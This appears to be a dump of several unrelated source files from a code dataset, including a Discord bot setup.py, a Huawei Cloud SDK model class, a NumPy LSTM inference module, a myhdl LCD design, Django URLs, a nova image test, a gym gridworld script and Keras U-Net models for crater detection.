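    diff = ca_coords[:, None, :] - ca_coords[None, :, :]  # shape (n, n, 3)
    return np.linalg.norm(diff, axis=2)                   # shape (n, n)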
| 3.296875
| 3
|
setup.py
|
MiltFra/discord-exchange
| 0
|
12782929
|
from setuptools import setup
setup(
name='discord-exchange',
version='0.0.1',
description='A Discord bot to trade on arbitrary quantities',
url='https://github.com/miltfra/discord-exchange',
author='<NAME>',
author_email='<EMAIL>',
license='Apache License 2.0',
packages=['discord_exchange'],
install_requires=[],
classifiers=[
'Development Status :: 1 - Planning',
'Intended Audience :: Science/Research',
        'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
)
| 1.265625
| 1
|
huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/query_vmr_pkg_res_result_dto.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
| 1
|
12782930
|
# coding: utf-8
import pprint
import re
import six
class QueryVmrPkgResResultDTO:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'vmr_pkg_id': 'str',
'vmr_name': 'str',
'vmr_pkg_parties': 'int',
'vmr_pkg_count': 'int',
'vmr_pkg_used_count': 'int'
}
attribute_map = {
'vmr_pkg_id': 'vmrPkgId',
'vmr_name': 'vmrName',
'vmr_pkg_parties': 'vmrPkgParties',
'vmr_pkg_count': 'vmrPkgCount',
'vmr_pkg_used_count': 'vmrPkgUsedCount'
}
def __init__(self, vmr_pkg_id=None, vmr_name=None, vmr_pkg_parties=None, vmr_pkg_count=None, vmr_pkg_used_count=None):
"""QueryVmrPkgResResultDTO - a model defined in huaweicloud sdk"""
self._vmr_pkg_id = None
self._vmr_name = None
self._vmr_pkg_parties = None
self._vmr_pkg_count = None
self._vmr_pkg_used_count = None
self.discriminator = None
if vmr_pkg_id is not None:
self.vmr_pkg_id = vmr_pkg_id
if vmr_name is not None:
self.vmr_name = vmr_name
if vmr_pkg_parties is not None:
self.vmr_pkg_parties = vmr_pkg_parties
if vmr_pkg_count is not None:
self.vmr_pkg_count = vmr_pkg_count
if vmr_pkg_used_count is not None:
self.vmr_pkg_used_count = vmr_pkg_used_count
@property
def vmr_pkg_id(self):
"""Gets the vmr_pkg_id of this QueryVmrPkgResResultDTO.
        Cloud meeting room package ID.
:return: The vmr_pkg_id of this QueryVmrPkgResResultDTO.
:rtype: str
"""
return self._vmr_pkg_id
@vmr_pkg_id.setter
def vmr_pkg_id(self, vmr_pkg_id):
"""Sets the vmr_pkg_id of this QueryVmrPkgResResultDTO.
        Cloud meeting room package ID.
:param vmr_pkg_id: The vmr_pkg_id of this QueryVmrPkgResResultDTO.
:type: str
"""
self._vmr_pkg_id = vmr_pkg_id
@property
def vmr_name(self):
"""Gets the vmr_name of this QueryVmrPkgResResultDTO.
        Cloud meeting room package name.
:return: The vmr_name of this QueryVmrPkgResResultDTO.
:rtype: str
"""
return self._vmr_name
@vmr_name.setter
def vmr_name(self, vmr_name):
"""Sets the vmr_name of this QueryVmrPkgResResultDTO.
        Cloud meeting room package name.
:param vmr_name: The vmr_name of this QueryVmrPkgResResultDTO.
:type: str
"""
self._vmr_name = vmr_name
@property
def vmr_pkg_parties(self):
"""Gets the vmr_pkg_parties of this QueryVmrPkgResResultDTO.
        Number of parties (participants) covered by the cloud meeting room package.
:return: The vmr_pkg_parties of this QueryVmrPkgResResultDTO.
:rtype: int
"""
return self._vmr_pkg_parties
@vmr_pkg_parties.setter
def vmr_pkg_parties(self, vmr_pkg_parties):
"""Sets the vmr_pkg_parties of this QueryVmrPkgResResultDTO.
        Number of parties (participants) covered by the cloud meeting room package.
:param vmr_pkg_parties: The vmr_pkg_parties of this QueryVmrPkgResResultDTO.
:type: int
"""
self._vmr_pkg_parties = vmr_pkg_parties
@property
def vmr_pkg_count(self):
"""Gets the vmr_pkg_count of this QueryVmrPkgResResultDTO.
        Total number of rooms allocated under this cloud meeting room package.
:return: The vmr_pkg_count of this QueryVmrPkgResResultDTO.
:rtype: int
"""
return self._vmr_pkg_count
@vmr_pkg_count.setter
def vmr_pkg_count(self, vmr_pkg_count):
"""Sets the vmr_pkg_count of this QueryVmrPkgResResultDTO.
        Total number of rooms allocated under this cloud meeting room package.
:param vmr_pkg_count: The vmr_pkg_count of this QueryVmrPkgResResultDTO.
:type: int
"""
self._vmr_pkg_count = vmr_pkg_count
@property
def vmr_pkg_used_count(self):
"""Gets the vmr_pkg_used_count of this QueryVmrPkgResResultDTO.
        Number of cloud meeting rooms already assigned from this package.
:return: The vmr_pkg_used_count of this QueryVmrPkgResResultDTO.
:rtype: int
"""
return self._vmr_pkg_used_count
@vmr_pkg_used_count.setter
def vmr_pkg_used_count(self, vmr_pkg_used_count):
"""Sets the vmr_pkg_used_count of this QueryVmrPkgResResultDTO.
        Number of cloud meeting rooms already assigned from this package.
:param vmr_pkg_used_count: The vmr_pkg_used_count of this QueryVmrPkgResResultDTO.
:type: int
"""
self._vmr_pkg_used_count = vmr_pkg_used_count
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, QueryVmrPkgResResultDTO):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
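# Minimal usage sketch (the field values below are illustrative, not taken
# from the SDK or its documentation):
if __name__ == '__main__':
    dto = QueryVmrPkgResResultDTO(vmr_pkg_id='pkg-001', vmr_name='demo',
                                  vmr_pkg_parties=25, vmr_pkg_count=10,
                                  vmr_pkg_used_count=3)
    print(dto.to_str())  # pretty-printed form of the dict built by to_dict()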
| 2.40625
| 2
|
test/dataloadertest.py
|
iseesaw/EAlib
| 4
|
12782931
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2019-09-22 00:54:06
# @Author : <NAME> (<EMAIL>)
# @Link : https://github.com/iseesaw
# @Version : $Id$
import os
from EAlib.utils.dataloader import BasicLoader
def BasicLoaderTest():
dirpath = "D:\\ACourse\\2019Fall\\EvolutionaryComputation\\TSP\\tsp"
for file in os.listdir(dirpath):
if file[-4:] == ".tsp":
BasicLoader(os.path.join(dirpath, file)).load()
BasicLoaderTest()
| 2.046875
| 2
|
model.py
|
xinjli/tflstm2np
| 1
|
12782932
|
<filename>model.py
import numpy as np
def lstm_cell(input_tensor, prev_hidden_tensor, prev_cell_state, kernel, bias):
"""
forward inference logic of a lstm cell
reference: https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/rnn/python/ops/lstm_ops.py
:param input_tensor: input tensor
    :param prev_hidden_tensor: tensor of the previous hidden state
    :param prev_cell_state: cell state tensor from the previous step
:param kernel: weight
:param bias: bias
:return: hidden tensor, cell state tensor
"""
xh = np.concatenate([input_tensor, prev_hidden_tensor])
h = np.dot(xh, kernel)+bias
i, ci, f, o = np.split(h, 4)
# embed sigmoid to reduce function call
i = 1. / (1. + np.exp(-i))
f = 1. / (1. + np.exp(-f))
o = 1. / (1. + np.exp(-o))
ci = np.tanh(ci)
cs = np.multiply(ci, i) + np.multiply(prev_cell_state, f)
co = np.tanh(cs)
h = np.multiply(co, o)
return h, cs
def dynamic_rnn(input_tensors, kernel, bias):
"""
inference logic of an unidirectional lstm
:param input_tensors: a list of input tensor
:param kernel: weight
:param bias: bias
:return: hidden tensors, cell state tensors
"""
hidden_size = int(bias.shape[0]/4)
prev_hidden = np.zeros(hidden_size)
prev_cell_state = np.zeros(hidden_size)
hidden_lst = []
cell_state_lst = []
for input_tensor in input_tensors:
hidden, cell_state = lstm_cell(input_tensor, prev_hidden, prev_cell_state, kernel, bias)
hidden_lst.append(hidden)
cell_state_lst.append(cell_state)
prev_hidden = hidden
prev_cell_state = cell_state
return hidden_lst, cell_state_lst
def bidirectional_dynamic_rnn(input_tensors, forward_kernel, forward_bias, backward_kernel, backward_bias):
"""
inference logic of a bidirectional lstm
:param input_tensors: a list of input tensor
:param forward_kernel: kernel weight of forward cell
:param forward_bias: kernel bias of forward cell
:param backward_kernel: kernel weight of backward cell
:param backward_bias: kernel bias of backward cell
:return: forward_hidden, backward_hidden
"""
# reverse input tensors
inv_input_tensors = input_tensors[::-1]
# forward and backward
forward_hidden_lst, _ = dynamic_rnn(input_tensors, forward_kernel, forward_bias)
backward_hidden_lst, _ = dynamic_rnn(inv_input_tensors, backward_kernel, backward_bias)
# reverse backward hidden
backward_hidden_lst.reverse()
return np.array(forward_hidden_lst), np.array(backward_hidden_lst)
def stack_bidirectional_dynamic_rnn(inps, forward_kernel_lst, forward_bias_lst, backward_kernel_lst, backward_bias_lst):
"""
inference logic of a stack bidirectional lstm
:param input_tensors: a list of input tensor
:param forward_kernel_lst: kernel weight of forward cell for each layer
:param forward_bias_lst: kernel bias of forward cell for each layer
:param backward_kernel_lst: kernel weight of backward cell for each layer
:param backward_bias_lst: kernel bias of backward cell for each layer
:return: combined hiddens
"""
layer_size = len(forward_kernel_lst)
# check the number of layer is same
assert len(forward_bias_lst) == layer_size
assert len(backward_kernel_lst) == layer_size
assert len(backward_bias_lst) == layer_size
# the shape of first layer is different from other layers, run it separately
forward_hidden, backward_hidden = bidirectional_dynamic_rnn(inps, forward_kernel_lst[0], forward_bias_lst[0], backward_kernel_lst[0], backward_bias_lst[0])
for i in range(1, layer_size):
hiddens = np.concatenate([forward_hidden, backward_hidden], axis=1)
forward_hidden, backward_hidden = bidirectional_dynamic_rnn(hiddens, forward_kernel_lst[i], forward_bias_lst[i], backward_kernel_lst[i], backward_bias_lst[i])
return np.concatenate([forward_hidden, backward_hidden], axis=1)
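# Smoke-test sketch with random weights (shapes are illustrative): for a layer
# with input size d_in and hidden size h, lstm_cell above expects a kernel of
# shape (d_in + h, 4 * h) and a bias of shape (4 * h,).
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    d_in, h, steps = 5, 3, 7
    inputs = [rng.randn(d_in) for _ in range(steps)]
    fw_kernels = [rng.randn(d_in + h, 4 * h), rng.randn(2 * h + h, 4 * h)]
    fw_biases = [np.zeros(4 * h), np.zeros(4 * h)]
    bw_kernels = [rng.randn(d_in + h, 4 * h), rng.randn(2 * h + h, 4 * h)]
    bw_biases = [np.zeros(4 * h), np.zeros(4 * h)]
    out = stack_bidirectional_dynamic_rnn(
        inputs, fw_kernels, fw_biases, bw_kernels, bw_biases)
    print(out.shape)  # expected (7, 6): steps x (forward h + backward h)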
| 3.1875
| 3
|
autogalaxy/pipeline/phase/dataset/__init__.py
|
jonathanfrawley/PyAutoGalaxy_copy
| 0
|
12782933
|
<gh_stars>0
from autogalaxy.pipeline.phase.dataset.analysis import Analysis
from autogalaxy.pipeline.phase.dataset.meta_dataset import MetaDataset
from autogalaxy.pipeline.phase.dataset.result import Result
from .phase import PhaseDataset
| 1.078125
| 1
|
game.py
|
projeto-de-algoritmos/Trabalho_1_Graph_game
| 0
|
12782934
|
<filename>game.py
import pygame
import math
from pygame.locals import *
from screens import Menu
from screens import Question
from screens import Answer
from screens import Info
from screens import CreateLevel
from screens import Finish
from screens import SelectTam
class Game:
# Game constants
WIDTH = 1024
HEIGHT = 768
GAME_NAME = '<NAME>'
    INTRO_TEXT = 'Identify\n the bipartite graphs'
#Question state
CORRECT_ANSWER = 1
WRONG_ANSWER = 2
TIMES_UP = 3
# Game mods
STANDARD = 1
CUSTOM = 2
running = True
current_question = 0
max_questions = 0
game_mode = STANDARD
corrects_ans = 0
wrong_ans = 0
current_graph = None
current_screen = Menu.ID
state_question = CORRECT_ANSWER
graphs = []
standard_graphs = []
custom_graphs = []
def __init__(self):
self.screen = pygame.display.set_mode((self.WIDTH, self.HEIGHT))
self.menu_screen = Menu(self)
self.question_screen = Question(self)
self.answer_screen = Answer(self)
pygame.display.set_caption(self.GAME_NAME)
icon = pygame.image.load('icon.png')
pygame.display.set_icon(icon)
self.screens = []
self.add_screen(Menu)
self.add_screen(Question)
self.add_screen(Answer)
self.add_screen(Info)
self.add_screen(CreateLevel)
self.add_screen(Finish)
self.add_screen(SelectTam)
self.clock = pygame.time.Clock()
def add_screen(self, Screen):
self.screens.append(Screen(self))
def select_tam(self, tam):
for screen in self.screens:
if screen.ID == CreateLevel.ID:
screen.set_tam(tam)
self.change_screen(CreateLevel)
return
def run(self, graphs=[]):
pygame.init()
self.standard_graphs = graphs
self.max_questions = len(graphs)
while self.running:
for screen in self.screens:
if self.current_screen==screen.ID:
screen.run()
def start_game(self, game_mode=STANDARD):
self.current_question = 0
self.wrong_ans = 0
self.corrects_ans = 0
if game_mode == self.CUSTOM:
self.graphs = self.custom_graphs
else:
self.graphs = self.standard_graphs
self.max_questions = len(self.graphs)
self.change_screen(Question)
def quit_game(self):
self.running = False
def change_screen(self, screen):
self.current_screen = screen.ID
def answer_question(self, ans):
if self.current_graph.bipartite() == ans:
self.corrects_ans+=1
self.state_question = self.CORRECT_ANSWER
else:
self.wrong_ans+=1
self.state_question = self.WRONG_ANSWER
self.change_screen(Answer)
def no_answer_question(self):
self.current_graph.bipartite()
self.state_question = self.TIMES_UP
self.change_screen(Answer)
def next_question(self):
self.current_question = self.current_question+1
if self.current_question>=self.max_questions:
self.current_question = 0
self.change_screen(Finish)
else:
self.change_screen(Question)
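# The quiz above calls current_graph.bipartite(), which is defined elsewhere
# in the project. A minimal BFS two-coloring sketch of such a check follows
# (the adjacency-list representation here is hypothetical, for illustration):
from collections import deque
def is_bipartite(adjacency):
    color = {}
    for start in adjacency:
        if start in color:
            continue
        color[start] = 0
        queue = deque([start])
        while queue:
            u = queue.popleft()
            for v in adjacency[u]:
                if v not in color:
                    color[v] = 1 - color[u]
                    queue.append(v)
                elif color[v] == color[u]:
                    return False  # an odd cycle makes the graph non-bipartite
    return True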
| 3.21875
| 3
|
test/test_cores/test_video/mm_lt24lcdsys.py
|
meetps/rhea
| 1
|
12782935
|
<reponame>meetps/rhea<gh_stars>1-10
import myhdl
from myhdl import Signal, intbv
from rhea.system import Global, Clock, Reset
from rhea.cores.video import VideoMemory
from rhea.cores.video import color_bars
from rhea.cores.video.lcd import LT24Interface
from rhea.cores.video.lcd import lt24lcd
from rhea.cores.misc import glbl_timer_ticks
from rhea.utils.test import tb_move_generated_files
def mm_lt24lcdsys(clock, reset,
lcd_on, lcd_resetn, lcd_csn, lcd_rs,
lcd_wrn, lcd_rdn, lcd_data):
"""
"""
# interfaces
glbl = Global(clock, reset)
lcd = LT24Interface()
resolution = lcd.resolution
color_depth = lcd.color_depth
refresh_rate = 60
vmem = VideoMemory(resolution=resolution, color_depth=color_depth)
# assign the ports to the interface
lcd.assign(lcd_on, lcd_resetn, lcd_csn, lcd_rs, lcd_wrn,
lcd_rdn, lcd_data)
# simulation mode, reduce the dead time between real-world ticks
# modules
gtck = glbl_timer_ticks(glbl, user_timer=16, tick_div=100)
gbar = color_bars(glbl, vmem, resolution=resolution,
color_depth=color_depth)
glcd = lt24lcd(glbl, vmem, lcd)
return gtck, gbar, glcd
def convert():
clock = Clock(0, frequency=50e6)
reset = Reset(0, active=0, async=True)
lcd_on = Signal(bool(0))
lcd_resetn = Signal(bool(0))
lcd_csn = Signal(bool(0))
lcd_rs = Signal(bool(0))
lcd_wrn = Signal(bool(0))
lcd_rdn = Signal(bool(0))
lcd_data = Signal(intbv(0)[16:])
myhdl.toVerilog.directory = 'output'
myhdl.toVerilog(mm_lt24lcdsys, clock, reset,
lcd_on, lcd_resetn, lcd_csn, lcd_rs,
lcd_wrn, lcd_rdn, lcd_data)
myhdl.toVHDL.directory = 'output'
myhdl.toVHDL(mm_lt24lcdsys, clock, reset,
lcd_on, lcd_resetn, lcd_csn, lcd_rs,
lcd_wrn, lcd_rdn, lcd_data)
tb_move_generated_files()
| 2.015625
| 2
|
urls.py
|
0x0mar/PyDetector
| 1
|
12782936
|
from django.conf.urls import patterns, include, url
from pydetector.views import hello
from pydetector.views2 import *
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^logs/$', logs),
# Examples:
url(r'^$', welcome),
# url(r'^pydetector/', include('pydetector.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
)
| 1.953125
| 2
|
nova/tests/functional/test_images.py
|
lixiaoy1/nova
| 1
|
12782937
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.tests.functional.api import client
from nova.tests.functional import test_servers
class ImagesTest(test_servers.ServersTestBase):
def test_create_images_negative_invalid_state(self):
# Create server
server = self._build_minimal_create_server_request()
created_server = self.api.post_server({"server": server})
server_id = created_server['id']
found_server = self._wait_for_state_change(created_server, 'BUILD')
self.assertEqual('ACTIVE', found_server['status'])
# Create image
name = 'Snapshot 1'
self.api.post_server_action(
server_id, {'createImage': {'name': name}})
self.assertEqual('ACTIVE', found_server['status'])
# Confirm that the image was created
images = self.api.get_images(detail=False)
image_map = {image['name']: image for image in images}
found_image = image_map.get(name)
self.assertTrue(found_image)
# Change server status from ACTIVE to SHELVED for negative test
self.flags(shelved_offload_time = -1)
self.api.post_server_action(server_id, {'shelve': {}})
found_server = self._wait_for_state_change(found_server, 'ACTIVE')
self.assertEqual('SHELVED', found_server['status'])
# Create image in SHELVED (not ACTIVE, etc.)
name = 'Snapshot 2'
ex = self.assertRaises(client.OpenStackApiException,
self.api.post_server_action,
server_id,
{'createImage': {'name': name}})
self.assertEqual(409, ex.response.status_code)
self.assertEqual('SHELVED', found_server['status'])
# Confirm that the image was not created
images = self.api.get_images(detail=False)
image_map = {image['name']: image for image in images}
found_image = image_map.get(name)
self.assertFalse(found_image)
# Cleanup
self._delete_server(server_id)
| 1.796875
| 2
|
tests/test.py
|
dirkmcpherson/gym-novel-gridworlds
| 2
|
12782938
|
<reponame>dirkmcpherson/gym-novel-gridworlds
import time
import gym
import gym_novel_gridworlds
from gym_novel_gridworlds.wrappers import SaveTrajectories, LimitActions
from gym_novel_gridworlds.observation_wrappers import LidarInFront, AgentMap
from gym_novel_gridworlds.novelty_wrappers import inject_novelty
from stable_baselines.common.policies import MlpPolicy
from stable_baselines.common.vec_env import DummyVecEnv
from stable_baselines import PPO2
env_id = 'NovelGridworld-Bow-v0' # 'NovelGridworld-v1'
env = gym.make(env_id)
env = LimitActions(env, {'Forward', 'Left', 'Right', 'Break', 'Craft_bow'})
env = LidarInFront(env)
env = inject_novelty(env, 'firewall', 'hard', '', '')
# Load the trained agent
model = PPO2.load('NovelGridworld-Bow-v0_1000_8beams0filled11hypotenuserange3items_in_360degrees_last_model')
# env.map_size = 20
# env.items_quantity = {'crafting_table': 2}
# env.action_str = {0: 'Forward', 1: 'Right', 2: 'Left'}
for i_episode in range(10):
print("EPISODE STARTS")
obs = env.reset()
for i in range(100):
action, _states = model.predict(obs)
obs, reward, done, info = env.step(action)
env.render()
# if i_episode == 0 and i == 0:
# time.sleep(10)
print("Episode #: " + str(i_episode) + ", step: " + str(i) + ", reward: ", reward)
# End the episode if agent is dead
if done:
print("Episode #: "+str(i_episode)+" finished after "+str(i)+" timesteps\n")
time.sleep(1)
break
| 2.21875
| 2
|
cnn_model/unet.py
|
WangSong960913/CraterDetection
| 5
|
12782939
|
from keras.models import Model
from keras.optimizers import Adam, SGD
from keras.layers.core import Dropout, Reshape
from keras.layers import PReLU, Conv2DTranspose
from keras.layers import Input, Dense, Dropout, LeakyReLU, BatchNormalization, Conv2D, MaxPooling2D, AveragePooling2D, \
concatenate, Activation, ZeroPadding2D
from keras.layers import add, Flatten
from keras.losses import mean_squared_error, binary_crossentropy, sparse_categorical_crossentropy
from keras import losses
import keras.backend as K
import numpy as np
from keras.regularizers import l2
# Check Keras version - code will switch API if needed.
from keras import __version__ as keras_version
k2 = True if keras_version[0] == '2' else False
# If Keras is v2.x.x, create Keras 1-syntax wrappers.
if not k2:
from keras.layers import merge, Input
from keras.layers.convolutional import (Convolution2D, MaxPooling2D,
UpSampling2D)
else:
from keras.layers import Concatenate, Input
from keras.layers.convolutional import (Conv2D, MaxPooling2D,
UpSampling2D)
def merge(layers, mode=None, concat_axis=None):
"""Wrapper for Keras 2's Concatenate class (`mode` is discarded)."""
return Concatenate(axis=concat_axis)(list(layers))
def Convolution2D(n_filters, FL, FLredundant, activation=None,
init=None, W_regularizer=None, border_mode=None):
"""Wrapper for Keras 2's Conv2D class."""
return Conv2D(n_filters, FL, activation=activation,
kernel_initializer=init,
kernel_regularizer=W_regularizer,
padding=border_mode)
def Conv(x, out_channels, dilation_rate=(1, 1)):
return Conv2D(out_channels, kernel_size=(3, 3), strides=(1, 1), dilation_rate=dilation_rate, padding='same')(x)
def UpConv(x, out_channels):
return Conv2DTranspose(out_channels, kernel_size=(3, 3), strides=(2, 2), padding='same', output_padding=(1, 1))(x)
def BN_Conv_Relu(x, out_channels, dilation_rate=(1, 1)):
x = BatchNormalization(axis=3, momentum=0.01)(x)
x = Conv2D(out_channels, kernel_size=(3, 3), strides=(1, 1), dilation_rate=dilation_rate, padding='same')(x)
    x = Activation('relu')(x)  # keras.layers.ReLU is not imported above; Activation matches BN_UpConv_Relu
return x
def BN_UpConv_Relu(x, out_channels):
x = BatchNormalization(axis=3, momentum=0.01)(x)
x = UpConv(x, out_channels)
x = Activation('relu')(x)
return x
def ConvOut(x):
return Conv2D(1, kernel_size=(1, 1), strides=(1, 1), padding='valid')(x)
def unet_pooling_3(dim,start_filter,lr=0.0001):
inpt = Input(batch_shape=(None, dim, dim, 1))
BCR3 = BN_Conv_Relu(inpt, start_filter) # BUCR40
BCR4 = BN_Conv_Relu(BCR3, start_filter)
MP5 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='valid')(BCR4)
BCR6 = BN_Conv_Relu(MP5, start_filter*2)
BCR7 = BN_Conv_Relu(BCR6, start_filter*2) # BUCR36
BCR8 = BN_Conv_Relu(BCR7, start_filter*2)
MP9 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='valid')(BCR8)
BCR10 = BN_Conv_Relu(MP9, start_filter*4)
BCR11 = BN_Conv_Relu(BCR10, start_filter*4) # BUCR32
BCR12 = BN_Conv_Relu(BCR11, start_filter*4)
MP13 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='valid')(BCR12)
BCR30 = BN_Conv_Relu(MP13, start_filter*4)
BCR31 = BN_Conv_Relu(BCR30, start_filter*4)
BUCR32 = BN_UpConv_Relu(BCR31, start_filter*4) # BCR11
Add33 = add([BUCR32, BCR11])
BCR34 = BN_Conv_Relu(Add33, start_filter*4)
BCR35 = BN_Conv_Relu(BCR34, start_filter*4)
BUCR36 = BN_UpConv_Relu(BCR35, start_filter*2) # BCR7
Add37 = add([BUCR36, BCR7])
BCR38 = BN_Conv_Relu(Add37, start_filter*2)
BCR39 = BN_Conv_Relu(BCR38, start_filter*2)
BUCR40 = BN_UpConv_Relu(BCR39, start_filter) # BCR3
Add41 = add([BUCR40, BCR3])
BCR42 = BN_Conv_Relu(Add41, start_filter)
BCR43 = BN_Conv_Relu(BCR42, start_filter)
CO44 = ConvOut(BCR43)
out = Conv2D(1, 1, activation='sigmoid', padding='same')(CO44)
out = Reshape((dim, dim))(out)
model = Model(inputs=inpt, outputs=out) # convd2d
optimizer = Adam(lr=lr)
model.compile(loss='binary_crossentropy', metrics=['binary_accuracy'], optimizer=optimizer)
model.summary()
return model
#<NAME>'s UNet for crater detection
def unet(dim, learn_rate, lmbda, drop, FL, init, n_filters):
"""Function that builds the (UNET) convolutional neural network.
Parameters
----------
dim : int
Dimension of input images (assumes square).
learn_rate : float
Learning rate.
lmbda : float
Convolution2D regularization parameter.
drop : float
Dropout fraction.
FL : int
Filter length.
init : string
Weight initialization type.
n_filters : int
Number of filters in each layer.
Returns
-------
model : keras model object
Constructed Keras model.
"""
print('Making UNET model...')
img_input = Input(batch_shape=(None, dim, dim, 1))
a1 = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(img_input)
a1 = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a1)
a1P = MaxPooling2D((2, 2), strides=(2, 2))(a1)
a2 = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a1P)
a2 = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a2)
a2P = MaxPooling2D((2, 2), strides=(2, 2))(a2)
a3 = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a2P)
a3 = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a3)
a3P = MaxPooling2D((2, 2), strides=(2, 2), )(a3)
u = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a3P)
u = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = UpSampling2D((2, 2))(u)
u = merge((a3, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = UpSampling2D((2, 2))(u)
u = merge((a2, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = UpSampling2D((2, 2))(u)
u = merge((a1, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
# Final output
final_activation = 'sigmoid'
u = Convolution2D(1, 1, 1, activation=final_activation, init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Reshape((dim, dim))(u)
if k2:
model = Model(inputs=img_input, outputs=u)
else:
model = Model(input=img_input, output=u)
optimizer = Adam(lr=learn_rate)
model.compile(loss='binary_crossentropy',metrics=['binary_accuracy'], optimizer=optimizer)
print(model.summary())
return model
def unet_ConvT(dim, learn_rate, lmbda, drop, FL, init, n_filters):
"""Function that builds the (UNET) convolutional neural network.
Parameters
----------
dim : int
Dimension of input images (assumes square).
learn_rate : float
Learning rate.
lmbda : float
Convolution2D regularization parameter.
drop : float
Dropout fraction.
FL : int
Filter length.
init : string
Weight initialization type.
n_filters : int
Number of filters in each layer.
Returns
-------
model : keras model object
Constructed Keras model.
"""
print('Making UNET model...')
img_input = Input(batch_shape=(None, dim, dim, 1))
a1 = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(img_input)
a1 = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a1)
a1P = MaxPooling2D((2, 2), strides=(2, 2))(a1)
a2 = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a1P)
a2 = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a2)
a2P = MaxPooling2D((2, 2), strides=(2, 2))(a2)
a3 = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a2P)
a3 = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a3)
a3P = MaxPooling2D((2, 2), strides=(2, 2), )(a3)
u = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a3P)
u = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Conv2DTranspose(n_filters * 4, (3, 3), strides=(2, 2), padding="same")(u)
u = merge((a3, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Conv2DTranspose(n_filters* 2, (3, 3), strides=(2, 2), padding="same")(u)
